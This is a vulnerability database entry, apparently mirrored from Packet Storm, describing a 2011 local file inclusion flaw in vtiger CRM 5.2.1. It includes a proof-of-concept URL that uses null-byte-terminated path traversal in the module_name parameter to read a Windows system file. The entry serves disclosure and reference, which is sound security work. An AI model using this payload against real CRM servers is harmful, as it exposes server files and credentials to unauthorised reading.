ID
VAR-E-201104-0865
TITLE
vtiger CRM 5.2.1 Local File Inclusion
Trust: 0.5
DESCRIPTION
A local file inclusion vulnerability in vtiger CRM version 5.2.1 can be exploited to include arbitrary files.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | vtiger | model: | crm | scope: | eq | version: | 5.2.1 | Trust: 0.5 |
EXPLOIT
------------------------------------------------------------------------
Software................vtiger CRM 5.2.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.vtiger.com/
Discovery Date..........4/5/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in vtiger CRM 5.2.1 can be
exploited to include arbitrary files.
--PoC--
http://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
arbitrary, file inclusion
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | arbitrary | Trust: 0.5 |
| tag: | local | Trust: 0.5 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
AutoSec Tools
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 100182 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 100182 |
LAST UPDATE DATE
2022-07-27T09:33:12.936000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 100182 | date: | 2011-04-07T21:57:15 |